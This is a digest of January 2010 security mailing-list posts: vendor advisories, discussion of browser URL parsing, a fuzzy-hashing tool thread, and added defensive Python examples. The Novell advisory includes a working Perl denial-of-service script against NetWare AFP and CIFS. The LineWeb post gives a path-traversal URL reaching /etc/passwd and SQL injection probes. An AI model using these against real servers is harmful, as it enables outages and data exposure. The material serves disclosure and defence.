Re: Secunia Research: TSC2 Help Desk CTab ActiveX Control Buffer Overflow

2010-01-05 Thread sales
Please note that as of version 4.3.1, TSC2 Help Desk includes the

patched version of c1sizer.ocx (version 8.0.20081.142) which does not

have the buffer overflow vulnerability.





Servantix LLC



{PRL} Novell Netware CIFS And AFP Remote Memory Consumption DoS

2010-01-05 Thread Protek Research Lab
#

Application:   Novell Netware CIFS And AFP Remote Memory Consumption DoS
Platforms:     Novell Netware 6.5 SP8
Crash:         YES
Exploitation:  Remote DoS
Date:          2009-12-21
Author:        Francis Provencher (Protek Research Lab's)
Blog:          http://protekresearch.blogspot.com/

#

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#

===
1) Introduction
===

Novell,Inc. is a global software and services company based in Waltham, 
Massachusetts. The company specializes in enterprise operating systems, such as 
SUSE Linux Enterprise and Novell NetWare; identity, security, and systems 
management solutions; and collaboration solutions, such as Novell Groupwise and 
Novell Pulse.

Novell was instrumental in making the Utah Valley a focus for technology and 
software development. Novell technology contributed to the emergence of local 
area networks, which displaced the dominant mainframe computing model and 
changed computing worldwide. Today, a primary focus of the company is on 
developing open source software for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#


2) Report Timeline


2009-12-21 Vendor Contact
2009-12-22 Vendor Recontact
2009-12-29 Vendor Recontact
2010-01-05 Disclosure of this advisory

#


3) Technical details


CIFS.nlm Semantic Agent (Build 163 MP)
Version 3.27 November 13, 2008

AFPTCP.nlm Build 163 SP
Version 3.27 November 13, 2008


The CIFS and AFP services have a memory consumption problem when they
receive lots of malformed arbitrary requests. Sending arbitrary crafted
requests to these services will consume all the available memory, create
multiple abends and finally crash the whole server. It could take a couple
of minutes to hours (depending on the memory available on the server).



#

===
4) The Code
===

#!/usr/bin/perl
#       Found by Francis Provencher for Protek Research Lab's
#       {PRL} Novell Netware CIFS.nlm Remote Memory Consumption Denial of Service
#       Here is a modified version from the script written by the researcher Jeremy Brown
#       http://jbrownsec.blogspot.com/2009/12/writing-code-that-breaks-code.html
#
#       Loop forever: connect to the service, send a random-length blob of
#       random printable characters, disconnect. The server never frees what
#       it allocated for the garbage request, so memory runs out over time.

use strict;
use warnings;
use IO::Socket;
use String::Random;

my $target   = $ARGV[0];
my $port     = 548;      # AFPTCP.nlm; use 445 (or 139) for CIFS.nlm
my $protocol = 'tcp';
my $maxsize  = 666;      # upper bound on the random payload length
my $random;

if (!defined($target)) {
    print "usage: $0 <target>\n";
    exit;
}

while (1) {
    my $sock = IO::Socket::INET->new(Proto    => $protocol,
                                     PeerHost => $target,
                                     PeerPort => $port);
    unless ($sock) {
        # connection failures are expected once the server starts abending; note it and retry
        warn "connect to $target:$port failed: $!\n";
        sleep 1;
        next;
    }

    # randpattern() turns each '.' into a random printable character
    my $rand = String::Random->new;
    $random = $rand->randpattern("." x int(rand($maxsize))) . "\r\n\r\n";

    $sock->send($random);
    close($sock);
}


#
(PRL-2009-27)
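The advisory describes the attack only from the sender's side. As an added example (not part of the advisory or the PoC), this is the detection a practitioner would want on the other side: a sliding-window count of connections per client to the CIFS and AFP listeners over firewall-style connection logs. It assumes CIFS.nlm listens on 139/445 and AFPTCP.nlm on 548/tcp (the port the PoC targets); the log line format and the sample lines are constructed here.

```python
"""Added example, not part of the advisory: flag a flood of short connections
to the NetWare CIFS and AFP listeners in firewall-style connection logs.
Assumptions: CIFS.nlm on 139/445 and AFPTCP.nlm on 548 (the port the PoC
targets); the log line format and the sample lines are constructed."""

import re
from collections import defaultdict
from datetime import datetime, timedelta

WATCHED_PORTS = {139: "cifs", 445: "cifs", 548: "afp"}
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) bytes=(?P<bytes>\d+)$"
)


def parse(line: str):
    """One accepted-connection record, or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"]), "bytes": int(m["bytes"])}


def find_floods(lines, window_s: int = 60, threshold: int = 20) -> dict:
    """Map (src, dst, service) -> peak connection count inside any window_s
    seconds, for keys whose peak reaches threshold. Sliding window over the
    sorted timestamps of each key, so it is linear per key after the sort."""
    events = defaultdict(list)
    for line in lines:
        e = parse(line)
        if e and e["dport"] in WATCHED_PORTS:
            events[(e["src"], e["dst"], WATCHED_PORTS[e["dport"]])].append(e["ts"])
    floods = {}
    for key, times in events.items():
        times.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(times):
            while (t - times[lo]).total_seconds() > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            floods[key] = peak
    return floods


def constructed_log(n_flood: int = 50) -> list:
    """Constructed sample: one host hitting AFP twice a second with small
    blobs (the PoC's pattern), a normal CIFS client, web traffic, and one
    malformed line."""
    t0 = datetime(2009, 12, 21, 10, 0, 0)
    lines = [f"{(t0 + timedelta(milliseconds=500 * i)).isoformat()} "
             f"src=10.0.0.5 dst=10.0.0.10 dport=548 bytes={300 + i}"
             for i in range(n_flood)]
    for minute in (1, 4, 9):
        lines.append(f"{(t0 + timedelta(minutes=minute)).isoformat()} "
                     f"src=10.0.0.7 dst=10.0.0.10 dport=445 bytes=18204")
    lines.append(f"{t0.isoformat()} src=10.0.0.8 dst=10.0.0.11 dport=80 bytes=5120")
    lines.append("2009-12-21 garbage line that does not parse")
    return lines


if __name__ == "__main__":
    for (src, dst, svc), n in find_floods(constructed_log()).items():
        print(f"flood: {src} -> {dst} {svc}: {n} connections in 60 s")
```

The threshold is deliberately low for the constructed sample; on a real file server the baseline for legitimate CIFS clients is much higher, so tune it from a few days of normal logs rather than from this number.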






[ GLSA 201001-03 ] PHP: Multiple vulnerabilities

2010-01-05 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201001-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: PHP: Multiple vulnerabilities
  Date: January 05, 2010
  Bugs: #249875, #255121, #260576, #261192, #266125, #274670,
#280602, #285434, #292132, #293888, #297369, #297370
ID: 201001-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities were found in PHP, the worst of which leading
to the remote execution of arbitrary code.

Background
==========

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-lang/php              < 5.2.12                       >= 5.2.12

Description
===========

Multiple vulnerabilities have been discovered in PHP. Please review the
CVE identifiers referenced below and the associated PHP release notes
for details.

Impact
======

A context-dependent attacker could execute arbitrary code via a
specially crafted string containing an HTML entity when the mbstring
extension is enabled. Furthermore a remote attacker could execute
arbitrary code via a specially crafted GD graphics file.

A remote attacker could also cause a Denial of Service via a malformed
string passed to the json_decode() function, via a specially crafted
ZIP file passed to the php_zip_make_relative_path() function, via a
malformed JPEG image passed to the exif_read_data() function, or via
temporary file exhaustion. It is also possible for an attacker to spoof
certificates, bypass various safe_mode and open_basedir restrictions
when certain criteria are met, perform Cross-site scripting attacks,
more easily perform SQL injection attacks, manipulate settings of other
virtual hosts on the same server via a malicious .htaccess entry when
running on Apache, disclose memory portions, and write arbitrary files
via a specially crafted ZIP archive. Some vulnerabilities with unknown
impact and attack vectors have been reported as well.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PHP users should upgrade to the latest version. As PHP is
statically linked against a vulnerable version of the c-client library
when the imap or kolab USE flag is enabled (GLSA 200911-03), users
should upgrade net-libs/c-client beforehand:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/c-client-2007e"
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.2.12"

References
==========

  [ 1 ] CVE-2008-5498
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5498
  [ 2 ] CVE-2008-5514
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5514
  [ 3 ] CVE-2008-5557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5557
  [ 4 ] CVE-2008-5624
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5624
  [ 5 ] CVE-2008-5625
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5625
  [ 6 ] CVE-2008-5658
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5658
  [ 7 ] CVE-2008-5814
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5814
  [ 8 ] CVE-2008-5844
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5844
  [ 9 ] CVE-2008-7002
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7002
  [ 10 ] CVE-2009-0754
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0754
  [ 11 ] CVE-2009-1271
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1271
  [ 12 ] CVE-2009-1272
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1272
  [ 13 ] CVE-2009-2626
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2626
  [ 14 ] CVE-2009-2687
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2687
  [ 15 ] CVE-2009-3291
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291
  [ 16 ] CVE-2009-3292
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292
  [ 17 ] CVE-2009-3293
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293
  [ 18 ] CVE-2009-3546
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546
  [ 19 ] CVE-2009-3557
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557
  [ 20 ] CVE-2009-3558
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558
  [ 21 ] CVE-2009-4017
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017
  [ 22 ] CVE-2009

Re: Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

2010-01-05 Thread Michal Zalewski
Aditya,

> Video: http://www.secniche.org/videos/google_chrome_link_inj.html

You might find it informative to review the section of BSH on URL parsing:
http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators

There are many known quirks related to URL parsing; the practice of
certain browsers to tokenize the authority section using the rightmost
@ sign, in particular, is documented there. Three other spectacular
examples include:

http://example.com;.coredump.cx/ - MSIE will take you somewhere else
than most other browsers would
http://example.c...@coredump.cx/ - means one thing to most browsers,
something else to Firefox
https:example.com - absolute to Firefox (while http:example.com is a
relative link in that same browser)

In essence, any site that accepts, but does not normalize and rewrite
relative / not well formed URLs, and hopes to achieve any degree of
control over the destination of that link, is bound to fail. The
particular example in your video seems to be a clear case of
insufficient validation, and not a browser bug.

It is also unfortunate that URL parsing is deceptively difficult for
humans, but that's the way it is; address bar host name highlighting
and auto-hiding of credentials is the only sensible approach I can
think of; crippling URL syntax, on the other hand, seems heavy-handed.

/mz
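The point above, that a site which keeps a link's text but does not parse, normalize and rewrite it cannot control where the link goes, in working code. This is an added example, not from the post: the host names are the post's (example.com, coredump.cx); the `@` URL and the last two entries in LINKS are constructed in the same spirit. It uses Python's urllib.parse, which splits the authority on the rightmost `@` exactly as the post describes browsers doing.

```python
"""Added example, not from the post: a prefix check on link text versus a
parse-and-rewrite check. Host names come from the post's examples; the
'@' URL and the trailing entries in LINKS are constructed here."""

from urllib.parse import urlsplit, urlunsplit

TRUSTED_HOST = "example.com"

# Constructed inputs in the spirit of the post's examples.
LINKS = [
    "http://example.com/page",             # legitimate
    "http://EXAMPLE.com:80/a?b=1#c",       # legitimate, needs canonicalising
    "http://example.com;.coredump.cx/",    # MSIE parses this differently from other browsers
    "http://example.com@coredump.cx/",     # rightmost-@ rule: the host is coredump.cx
    "https:example.com",                   # absolute in Firefox, relative elsewhere
    "//coredump.cx/",                      # scheme-relative, depends on the page's scheme
]


def naive_allows(url: str) -> bool:
    """The check that fails: 'starts with our site' taken to mean 'stays on our site'."""
    return url.startswith(("http://example.com", "https://example.com"))


def effective_host(url: str):
    """Host most browsers would connect to. urlsplit splits the authority on the
    rightmost '@' (and lower-cases the host), which is exactly why the userinfo
    trick fools a textual prefix check."""
    return urlsplit(url).hostname


def normalize_link(url: str):
    """Return a canonical absolute URL on TRUSTED_HOST, or None to reject.
    Relative, scheme-less, scheme-relative, userinfo-bearing or off-host links
    are rejected rather than 'repaired': those are the inputs browsers disagree on."""
    p = urlsplit(url)
    if p.scheme not in ("http", "https") or not p.netloc:
        return None
    if p.username is not None or p.password is not None:
        return None
    if p.hostname != TRUSTED_HOST:
        return None
    try:
        port = p.port                       # raises ValueError on a junk port
    except ValueError:
        return None
    default = 80 if p.scheme == "http" else 443
    netloc = p.hostname if port in (None, default) else f"{p.hostname}:{port}"
    return urlunsplit((p.scheme, netloc, p.path or "/", p.query, p.fragment))


def audit(links):
    """(url, naive verdict, normalized result) for each link."""
    return [(u, naive_allows(u), normalize_link(u)) for u in links]


if __name__ == "__main__":
    for url, naive, canon in audit(LINKS):
        print(f"{url:36} naive={naive!s:5} host={effective_host(url)!s:26} -> {canon}")
```

Note that the naive check gets both directions wrong: it accepts the two coredump.cx links and rejects the upper-cased but perfectly valid example.com one. The rewritten URL, not the user's text, is what should be emitted into the page.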


[ MDVSA-2009:220-1 ] davfs

2010-01-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:220-1
 http://www.mandriva.com/security/
 ___

 Package : davfs
 Date: January 5, 2010
 Affected: 2008.0
 ___

 Problem Description:

 A vulnerability was found in xmltok_impl.c (expat) that with
 specially crafted XML could be exploited and lead to a denial of
 service attack. Related to CVE-2009-2625 (CVE-2009-3720).
 
 This update fixes this vulnerability.

 Update:

 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
 https://bugs.gentoo.org/show_bug.cgi?id=280615
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 1bdf969bcbde0e5c447f6c69a349e890  
2008.0/i586/davfs-0.2.4-10.1mdv2008.0.i586.rpm 
 3a0db412548d67a97686ef6f271f8898  
2008.0/SRPMS/davfs-0.2.4-10.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 569fe422111f00790722b845f1f51411  
2008.0/x86_64/davfs-0.2.4-10.1mdv2008.0.x86_64.rpm 
 3a0db412548d67a97686ef6f271f8898  
2008.0/SRPMS/davfs-0.2.4-10.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLQ2Y4mqjQ0CJFipgRAq38AKCWtvRQ5z4gxJH55M0FrV9p3bE9hgCg5gtj
L7XmKE06Lid2HmMNBazYzgY=
=p3B5
-END PGP SIGNATURE-



Multiple vulnerabilities in LineWeb 1.0.5

2010-01-05 Thread ign . sec
LineWeb is a web app to manage Lineage 2 private servers (a well-known MMORPG), and allows actions such as:

Main Features:

- Register
- Login
- Quick Login Function
- Quick statistics function (server status, game server status, online players)
- Statistics (login server status, game server status, players online, total accounts, total characters, total gm characters, total clans)

Administrator Features:

- (NEW) New administrator skin
- (NEW) New server settings (Edit server settings, server rates, specs etc)
- (NEW) New website settings (Title, Note from the management, Contact Email, Rankings Limit)
- (NEW) Ads Management (Add, Edit & Delete)
- News management (add, edit & delete)
- Download management (add, edit & delete)
- Login
- Add administrator
- Logout (of course)

Member Panel Features:

- Automatically views all your current characters when you login (name, level, kills etc)
- Change account password
- Delete account
- Logout

Live Demo Front : http://demo.l2web.org/

Live Demo Admin : http://demo.l2web.org/admin/



Demo Administrator Login:

user : demo

password : demo123





LFI:

We can find this part of code in index.php:



Which allows us to include local files via index.php by using the $op variable, e.g.:
http://localhost/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd

We can also find this vuln. in /admin/index.php, e.g.:

http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd



**



Strange behavior on op=register:

If we register a username twice, e.g.:
username=o&password=12345&confirmpassword=12345&email=&submit2=Register

We get:

The username already exists.

But if we send a long string twice, e.g.:
username=o&password=12345&confirmpassword=12345&email=&submit2=Register

We get:

Duplicate entry 'a' for key 'PRIMARY'







SQL Injection?

In admin/edit_news.php we can find this source:

65 elseif(isset($_GET['newsid']))
66 {
67
68     $result = mysql_query("SELECT * FROM news WHERE newsid='" . $_GET['newsid'] . "'");
69     while($myrow = mysql_fetch_array($result))
70     {
71

We can observe that no check at all is made on the input we supply in $newsid, so if we inject a " ' " in:

http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27

We get:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\Lineage ACM\lineweb_1.0.5\admin\edit_news.php on line 69

We can find this vuln in: edit_news.php, edit_downloads.php and edit_ads.php.

It requires magic_quotes = OFF



**



Edit without permission:

edit_downloads.php allows us to edit any download link, without any verification at all. By doing this, we could trick the user into downloading an infected file.

The same happens on edit_ads.php: if we give our URL values for ad_name and ad_content, we get, without any verification, permission to edit news:

http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA

By doing this we could perform HTML, XSS or CSS injection.



Ignacio Garrido,



Argentina.
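The two bugs above, the `op` include and the `newsid` query, as an added example that is not LineWeb's code: each pattern in its vulnerable form next to its hardened form, in Python with an in-memory SQLite table standing in for MySQL. The post does not show the include code or the real page file names, so BASE_DIR and the names in PAGES are assumptions, and the news rows are constructed.

```python
"""Added example, not LineWeb's code: the two patterns from the post, each in
its vulnerable and hardened form, using Python with an in-memory SQLite table
standing in for MySQL. BASE_DIR and the page names in PAGES are assumed;
the post does not show the include code or the real file names."""

import posixpath
import sqlite3

BASE_DIR = "/var/www/lineweb"                    # assumed install path
PAGES = {"register", "login", "stats", "news"}   # assumed page names behind ?op=


def include_target_vulnerable(op: str) -> str:
    """What an unchecked include($op)-style line effectively resolves to."""
    return posixpath.normpath(posixpath.join(BASE_DIR, op))


def is_inside(path: str, base: str) -> bool:
    """Containment check after normalisation: '..' segments are collapsed first,
    so a traversal string resolves to /etc/passwd and fails the prefix test."""
    base = base.rstrip("/") + "/"
    return posixpath.normpath(path).startswith(base)


def include_target_safe(op: str):
    """Allowlist first (the real fix), containment second (defence in depth)."""
    if op not in PAGES:
        return None
    target = posixpath.normpath(posixpath.join(BASE_DIR, op + ".php"))
    return target if is_inside(target, BASE_DIR) else None


def setup_db() -> sqlite3.Connection:
    """Constructed news table; not LineWeb's real schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "Server online"), (2, "Rates x5 weekend"), (3, "Maintenance")])
    return db


def news_vulnerable(db, newsid: str):
    """Mirrors edit_news.php line 68: the GET value is spliced into the SQL text."""
    return db.execute("SELECT * FROM news WHERE newsid='" + newsid + "'").fetchall()


def news_safe(db, newsid: str):
    """Bound parameter: the value never becomes part of the SQL text, so quote
    characters (and the magic_quotes setting) are irrelevant."""
    return db.execute("SELECT * FROM news WHERE newsid=?", (newsid,)).fetchall()


def breaks_query(db, newsid: str) -> bool:
    """True if the value turns the concatenated query into a syntax error, the
    condition behind the mysql_fetch_array() warning quoted in the post."""
    try:
        news_vulnerable(db, newsid)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    traversal = "../../../../../../../etc/passwd"
    print("unchecked include ->", include_target_vulnerable(traversal))
    print("allowlisted include ->", include_target_safe(traversal))
    db = setup_db()
    payload = "1' OR '1'='1"
    print("concatenated:", news_vulnerable(db, payload))
    print("parameterised:", news_safe(db, payload))
```

The `' OR '1'='1` payload returns every row through the concatenated query and nothing through the parameterised one, because the bound value is compared as a single literal against the integer column. An allowlist of page names is the right fix for the include: a containment check alone would still let `op` pick any file under the web root.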


UPDATE: MITKRB5-SA-2009-003 [CVE-2009-3295] KDC denial of service in cross-realm referral processing

2010-01-05 Thread Tom Yu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Updated to reflect the need to authenticate for successful
exploitation.  This decreases the severity level of the vulnerability.

http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2009-003.txt
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (SunOS)

iEYEARECAAYFAktCxzcACgkQSO8fWy4vZo5vdgCgkB8odnwOQixbESFIpqoF0O6t
CboAoNfB6WfXjCnMzAKRe9ZgRyyYAk7b
=87Ju
-END PGP SIGNATURE-


Re: [Full-disclosure] [Tool] DeepToad 1.1.0

2010-01-05 Thread T Biehn
Hmm,
Wouldn't it be more useful to the sec community to have an algorithm
that abstracts at the -interpreted- content level? That is when
analyzing binaries I wouldn't think that this would classify two with
near identical functionality together, even though it is removing a
significant chunk of information during the hash pass.

I would largely assume that your algorithm, as is, works best on
uncompressed bitmaps. Is there something I'm missing?

-Travis

On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret  wrote:
> Hi all,
>
> I'm happy to announce the very first public release of the open source
> project DeepToad, a tool for computing fuzzy hashes from files.
>
> DeepToad can generate signatures, clusterize files and/or directories
> and compare them. It's inspired in the very good tool ssdeep [1] and, in
> fact, both projects are very similar.
>
> The complete project is written in pure python and is distributed under
> the LGPL license [2].
>
> Links:
> Project's Web Page http://code.google.com/p/deeptoad/
> Download Web Page http://code.google.com/p/deeptoad/downloads/list
> Wiki http://code.google.com/p/deeptoad/w/list
>
> References:
> [1] http://ssdeep.sourceforge.net/
> [2] http://www.gnu.org/licenses/lgpl.html
>
> Regards && Happy new year!
> Joxean Koret
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da


Re: [Full-disclosure] [Tool] DeepToad 1.1.0

2010-01-05 Thread Joxean Koret
Yes. It isn't designed to search for the differences between 2 binary files but 
to search for similar files, _independently_ of the format, and group them.

This tool can be used, for example, to search for similar "crapwares" or to 
search for similar image files (not similar looking, but similar files), 
similar office documents, etc...

--- On Tue, 5/1/10, T Biehn  wrote:

> From: T Biehn 
> Subject: Re: [Full-disclosure] [Tool] DeepToad 1.1.0
> To: "Dan Kaminsky" 
> CC: "Joxean Koret" , "Full Disclosure" 
> , bugtraq@securityfocus.com
> Date: Tuesday, 5 January 2010 15:56
> I can see what you're saying, it
> could be useful for finding
> differences in different versions of the same binary but
> from what I
> can see Joxean's app is meant to group files of the same
> 'type,' not
> provide 'diff' capabilities.
> 
> -Travis
> 
> On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky 
> wrote:
> > I looked into a fair amount of this sort of
> normalization back when I was
> > playing with dotplots.  The idea was to upgrade from
> simple Levenshtein
> > string comparison (with no knowledge of variable
> length x86 instructions,
> > pointers that shift from compile to compile, etc) to
> something with at least
> > some domain specific knowledge.  What I found,
> somewhat surprisingly, was
> > that dumb string comparison was more than enough.  In
> fact, when I compared
> > pre-patch and post-patch builds, it was easy to
> directly see when content
> > was added, removed, shifted in location, etc. 
> Joxean's going to have much
> > the same result -- as basic as his similarity metric
> is, he'll get the broad
> > strokes just fine.
> >
> > Ultimately the best approach is to build a graph of
> how functions interact
> > and measure graph isomorphism, but of course Halvar
> figured that out years
> > ago :)
> >
> > On Tue, Jan 5, 2010 at 3:41 PM, T Biehn 
> wrote:
> >>
> >> Hmm,
> >> Wouldn't it be more useful to the sec community to
> have a algorithm
> >> that abstracts at the -interpreted- content level?
> That is when
> >> analyzing binaries I wouldn't think that this
> would classify two with
> >> near identical functionality together, even though
> it is removing a
> >> significant chunk of information during the hash
> pass.
> >>
> >> I would largely assume that your algorithm, as is,
> works best on
> >> uncompressed bitmaps. Is there something I'm
> missing?
> >>
> >> -Travis
> >>
> >> On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret
> 
> wrote:
> >> > Hi all,
> >> >
> >> > I'm happy to announce the very first public
> release of the open source
> >> > project DeepToad, a tool for computing fuzzy
> hashes from files.
> >> >
> >> > DeepToad can generate signatures, clusterize
> files and/or directories
> >> > and compare them. It's inspired in the very
> good tool ssdeep [1] and, in
> >> > fact, both projects are very similar.
> >> >
> >> > The complete project is written in pure
> python and is distributed under
> >> > the LGPL license [2].
> >> >
> >> > Links:
> >> > Project's Web Page http://code.google.com/p/deeptoad/
> >> > Download Web Page http://code.google.com/p/deeptoad/downloads/list
> >> > Wiki http://code.google.com/p/deeptoad/w/list
> >> >
> >> > References:
> >> > [1] http://ssdeep.sourceforge.net/
> >> > [2] http://www.gnu.org/licenses/lgpl.html
> >> >
> >> > Regards && Happy new year!
> >> > Joxean Koret
> >> >
> >> >
> >> >
> ___
> >> > Full-Disclosure - We believe in it.
> >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> > Hosted and sponsored by Secunia - http://secunia.com/
> >> >
> >>
> >>
> >>
> >> --
> >> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF
> A73C
> >> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> >> http://pastebin.com/f6fd606da
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> 
> 
> 
> -- 
> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
> 
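The thread above turns on what a fuzzy hash of the ssdeep/DeepToad kind actually computes and why, as Kaminsky says, a dumb string comparison of the result is enough to see an insertion. As an added example, which is not DeepToad's or ssdeep's code, this is a minimal context-triggered piecewise hash: a rolling hash over a short window decides where blocks end, each block collapses to one signature character, signatures are compared by edit distance, and a greedy pass groups files. The window size, trigger, block size, alphabet and the sample inputs are this example's own choices.

```python
"""Added example, not DeepToad's or ssdeep's code: a minimal context-triggered
piecewise hash (CTPH) of the kind both tools use, plus the edit-distance
comparison and a greedy clustering step. Window size, trigger, block size and
alphabet are this example's own choices; the inputs are constructed."""

import hashlib
import random
import string

ALPHABET = string.ascii_letters + string.digits + "+/"   # 64 symbols
WINDOW = 7          # bytes of context that decide where a block ends
BLOCK_SIZE = 64     # a boundary fires about once every BLOCK_SIZE bytes


def rolling_hashes(data: bytes):
    """Yield a cheap rolling hash (sum of the last WINDOW bytes) at every
    offset. Because it only looks at a fixed window, inserting or deleting
    bytes changes the hash only near the edit, not everywhere after it."""
    h, win = 0, []
    for b in data:
        win.append(b)
        h += b
        if len(win) > WINDOW:
            h -= win.pop(0)
        yield h


def _block_char(block: bytes) -> str:
    """Map one block to a single signature character."""
    return ALPHABET[hashlib.sha256(block).digest()[0] % len(ALPHABET)]


def piecewise_hash(data: bytes) -> str:
    """One character per block; a block ends wherever the rolling hash hits
    the trigger value, so boundaries are decided by content, not by offset."""
    sig, start = [], 0
    for i, h in enumerate(rolling_hashes(data)):
        if h % BLOCK_SIZE == BLOCK_SIZE - 1:
            sig.append(_block_char(data[start:i + 1]))
            start = i + 1
    if start < len(data):
        sig.append(_block_char(data[start:]))
    return "".join(sig)


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; signatures are short, so the quadratic cost is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(sig_a: str, sig_b: str) -> int:
    """0..100: 100 means identical signatures, 0 means nothing in common."""
    longest = max(len(sig_a), len(sig_b))
    if longest == 0:
        return 100
    return round(100 * (1 - levenshtein(sig_a, sig_b) / longest))


def cluster(files: dict, threshold: int = 50) -> list:
    """Greedy grouping: a file joins the first cluster whose first member
    scores >= threshold against it, otherwise it starts a new cluster."""
    sigs = {name: piecewise_hash(data) for name, data in files.items()}
    clusters = []
    for name, sig in sigs.items():
        for members in clusters:
            if similarity(sigs[members[0]], sig) >= threshold:
                members.append(name)
                break
        else:
            clusters.append([name])
    return clusters


def constructed_samples() -> dict:
    """Constructed inputs, not real files: an 8 KiB pseudo-random blob, the
    same blob with 20 bytes inserted in the middle, and an unrelated blob."""
    rng = random.Random(2010)
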